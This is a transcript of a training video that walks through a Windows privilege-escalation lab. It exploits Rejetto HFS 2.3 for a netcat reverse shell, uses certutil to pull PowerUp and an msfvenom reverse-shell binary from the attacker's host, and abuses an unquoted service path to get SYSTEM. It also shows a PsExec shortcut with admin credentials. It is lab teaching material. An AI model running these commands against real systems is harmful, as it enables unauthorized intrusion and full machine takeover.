Privilege Escalation Walkthrough: Windows

Video Activity

Time
21 hours 43 minutes
Difficulty
Intermediate
CEU/CPE
22
Video Transcription
>> Welcome to the privilege escalation lab walkthrough. Buckle your seat belts, because we're going to be here for a while.

The unintended exploitation path that I had hinted at is using PsExec on the Windows box. If we are able to figure out the username and password, which you've seen before, the administrative password on the Windows box, and use Impacket PsExec. You saw this in the slides that I showed you about using PsExec. But if I do this, who am I? Well, I'm SYSTEM. That's the easy way.

Now let's go to the intended exploitation path. If we go, and I'd hinted it was a web-based exploitation path, so if we go to 192.168.119, you'll notice HTTP File Server. That looks interesting. Also, if you look at the link, it's rejetto HFS, and we have a version at 2.3. We can use searchsploit for rejetto, and we see we have a Python script here, so you can do this in Metasploit, or you can do it now. I'm going to show you how to not do it in Metasploit, because we don't rely on Metasploit for OSEP.

What I will do is searchsploit -m, and I'm going to take a look at this in mousepad, three, nine. Again, we're looking at code, we're reading the code. We need to understand what we need to change here. I see local IP and local port number. Again, they put comments here, which is very nice. I need to put my box, and whatever port I want my Netcat listener on. It will tell you your Netcat listener needs to be on the web server. Well, why don't we just use our web server, and we can leave that off. Let's make this 5555; we'll make things a little different here. But I'm going to use locate nc.exe, and here's Netcat. I'm going to put this, or move this, to /var/www/html. Also, copy might be the better way to go: cp nc.exe. Now I need to start my server: systemctl start apache2.

Now what I'm going to need to do, I'm going to split this, so my Netcat listener is on port 5555, and I'm going to try to run this script and specify our Windows host, 19, port 80. There we go. It says you may need to run it a few times, but now we are on user 1's desktop.

Now what we want to do is escalate privileges. whoami? We're user. net users: user 1. Are we an administrator? No, we're not. What we want to do is, I talked about the PowerUp script, so what I can do is locate PowerUp.ps1, and I see it here, so what I'm going to do is copy it right here. I'm going to start my server, Python 3 http.server. What I'm going to do is I need to use certutil to download this URL: certutil -urlcache -f http://192.168.1.50:8000/PowerUp.ps1. We see that we got that. We can check the directory, we see that. I need to go into PowerShell now. What I'm going to do is Import-Module PowerUp.ps1 and invoke checks, so it's checking, checking for unquoted service path, and it found it; it found some other things as well. But let's take a look at unquoted service path. We see we have a temp unquoted path. Well, that's a clue. You guys saw this in the lesson. If we make unquoted.exe, and if we can start or stop this service, we can get a shell as SYSTEM. I'm not going to use PowerUp. I'm going to make my own thing here. I will do msfvenom, payload is Windows shell reverse TCP, LHOST is me, LPORT 1234. We're going to do format is exe, and we're going to do unquoted.exe. Just waiting for this; there we go, like that.

I want to use certutil again, but why don't I just change directories to temp. certutil, I can see that I am in the root directory for my user. Root, that shell should be in here: certutil -urlcache -f http://192.168.1.50:8000/unquoted.exe unquoted.exe, dir. Now, we can try to see if we can start or stop this service. The service name is unquoted service. I'm going to get a PowerShell and also start my listener on 1234. sc start: access is denied, so what do I do now? I can try to shut down this machine and restart it and see what happens. If we restart, this unquoted.exe should make our shell, or activate our shell here. But it might take a while, because when we give the shutdown signal, I think it gives it about a minute to shut down, so we have to wait here patiently to get our shell. We see the system has restarted here to kick this off. Now again, we're waiting patiently to see if we get a shell here. There we go. whoami? Now we're SYSTEM.

We have successfully gotten from user 1 to, well, we don't even need that, to SYSTEM, so I can, if you're in the OSEP lab, you're going to change directory to Users, change directory to Administrator, change directory to Desktop, and we see that there's a flag there, flag.txt. There you go. There is your proof flag right there. That's the Windows machine, both unintended and intended exploitation paths.

Now let's pivot over to the Linux box. But what I'm going to do is make another video for that. If you want to go over the Windows machine, go ahead. But this is part 1 for the Windows machine, and I will make a part 2 for the Linux machine.